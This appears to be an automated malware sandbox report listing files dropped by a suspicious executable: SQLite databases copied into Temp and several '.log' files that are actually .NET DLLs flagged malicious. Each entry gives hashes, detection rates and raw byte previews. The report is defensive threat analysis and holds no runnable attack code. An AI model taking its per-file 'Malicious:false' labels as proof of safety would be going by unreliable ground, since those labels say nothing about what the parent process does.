                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\yQ4UttHevA

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\yUR9ngX5To

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\yW7qVJ3qQ1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ydYHz3OZUW

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ypSmQlqRT5

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\z94KxXW69i

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\zAE4nZhREf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\zXICzsOm7I

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\zsY55lNSHD

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\zsi3MVJitU

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\ASylWHNt.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):69632
                                                                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: VqGD18ELBM.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: updIMdPUj8.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: t8F7Ic986c.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: 544WP3NHaP.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: eP6sjvTqJa.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: 1znAXdPcM5.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: YGk3y6Tdix.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: U1jaLbTw1f.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: voed9G7p5s.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: Etqq32Yuw4.exe, Detection: malicious, Browse
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                                                                  C:\Users\user\Desktop\BtlmWJui.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):6.057993947082715
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\CidbNaiX.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):23552
                                                                                                                                                                  Entropy (8bit):5.529329139831718
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                                                                  MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                                                                  SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                                                                  SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                                                                  SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\CqMurJJc.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):69632
                                                                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                                                                  C:\Users\user\Desktop\CzktcvcZ.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):64000
                                                                                                                                                                  Entropy (8bit):5.857602289000348
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\EBWcxehU.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):33792
                                                                                                                                                                  Entropy (8bit):5.541771649974822
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\Desktop\EfGUsIxp.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):64000
                                                                                                                                                                  Entropy (8bit):5.857602289000348
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

